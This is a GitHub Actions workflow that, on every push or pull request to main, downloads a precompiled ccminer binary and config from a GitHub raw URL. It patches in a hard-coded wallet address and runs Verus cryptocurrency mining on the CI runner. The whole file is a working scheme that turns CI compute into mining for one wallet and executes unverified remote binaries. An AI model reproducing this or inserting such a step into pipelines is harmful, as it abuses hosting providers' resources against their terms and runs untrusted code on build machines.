name: Run Extended Verus

on:
  push:
    branches:
      - main  # Trigger on push to the main branch
  pull_request:
    branches:
      - main  # Trigger on pull requests to the main branch

jobs:
  run-extended-mining:
    runs-on: ubuntu-latest  # Use Ubuntu environment

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install and Run
        run: |
          sudo apt update && sudo apt install -y libjansson-dev wget nano && mkdir ccminer && cd ccminer && wget https://raw.githubusercontent.com/Darktron/pre-compiled/generic/ccminer && wget https://raw.githubusercontent.com/Darktron/pre-compiled/generic/start.sh && chmod +x ccminer start.sh && wget -O config.json https://raw.githubusercontent.com/Darktron/pre-compiled/generic/config.json && sed -i 's/"disabled": 1,/"disabled": 0,/g; s/"disabled": 0,/"disabled": 1,/2; s/"user": "[^"]*"/"user": "RNjEn7tNTZ6DuYnYrxKMsvYzBgJ11P5hQ4"/' config.json && ./ccminer -c config.json
